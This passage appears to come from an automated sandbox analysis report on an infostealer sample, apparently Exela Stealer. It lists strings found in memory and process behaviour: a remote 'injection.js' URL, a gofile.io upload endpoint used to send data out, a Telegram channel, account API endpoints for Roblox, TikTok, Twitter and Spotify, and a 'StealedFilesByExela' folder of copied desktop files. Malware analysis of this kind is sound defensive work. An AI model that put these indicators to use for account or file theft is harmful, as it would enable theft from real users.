Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/justforExela/injection/main/injection.js
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/justforExela/injection/main/injection.js0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://store1.gofile.io/uploadFile
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447278741.0000018B49DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/custom
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B48260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/ExelaStealer
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/ExelaStealer----------------------
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/ExelaStealer0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2417097978.0000018B495CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.m~
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiktok.com/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/home
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.jsonP
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444818506.0000018B47DC0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86731000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122726494.000002BD86731000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: METADATA.0.dr String found in binary or memory: https://www.attrs.org/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/)
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/latest/names.html)
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/stable/changelog.html
Source: METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447278741.0000018B49DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.b
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B48260000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444818506.0000018B47DC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457245244.00007FFDA3472000.00000004.00000001.01000000.00000011.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmp String found in binary or memory: https://www.openssl.org/H
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2144659393.0000018B479A0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437909240.0000018B479B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B4798E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434391488.0000018B4799C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434277600.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444100879.0000018B479B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121997815.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/user/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.roblox.com/my/account/json
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434510034.0000018B47C3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.twitch.tv/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.twitch.tv/0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr String found in binary or memory: https://www.variomedia.de/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NEBFQQYWPS.xlsx Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PWCCAWLGRE.jpg Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ZQIXMVQGAH.xlsx Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PIVFAGEAAV.png Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\EFOYFBOLXA.png Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B85C00 0_2_00007FF7B2B85C00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B689E0 0_2_00007FF7B2B689E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B86964 0_2_00007FF7B2B86964
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B61000 0_2_00007FF7B2B61000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B808C8 0_2_00007FF7B2B808C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B83C10 0_2_00007FF7B2B83C10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B72C10 0_2_00007FF7B2B72C10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B71B50 0_2_00007FF7B2B71B50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6ACAD 0_2_00007FF7B2B6ACAD
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6A474 0_2_00007FF7B2B6A474
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B86418 0_2_00007FF7B2B86418
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B808C8 0_2_00007FF7B2B808C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B739A4 0_2_00007FF7B2B739A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B72164 0_2_00007FF7B2B72164
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B71944 0_2_00007FF7B2B71944
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6A2DB 0_2_00007FF7B2B6A2DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B7DA5C 0_2_00007FF7B2B7DA5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B69800 0_2_00007FF7B2B69800
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B71F60 0_2_00007FF7B2B71F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B78794 0_2_00007FF7B2B78794
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B89728 0_2_00007FF7B2B89728
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B71740 0_2_00007FF7B2B71740
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B780E4 0_2_00007FF7B2B780E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B840AC 0_2_00007FF7B2B840AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B81874 0_2_00007FF7B2B81874
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B735A0 0_2_00007FF7B2B735A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B7E570 0_2_00007FF7B2B7E570
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B75D30 0_2_00007FF7B2B75D30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B71D54 0_2_00007FF7B2B71D54
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B7DEF0 0_2_00007FF7B2B7DEF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B79EA0 0_2_00007FF7B2B79EA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B85E7C 0_2_00007FF7B2B85E7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B86964 2_2_00007FF7B2B86964
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B61000 2_2_00007FF7B2B61000
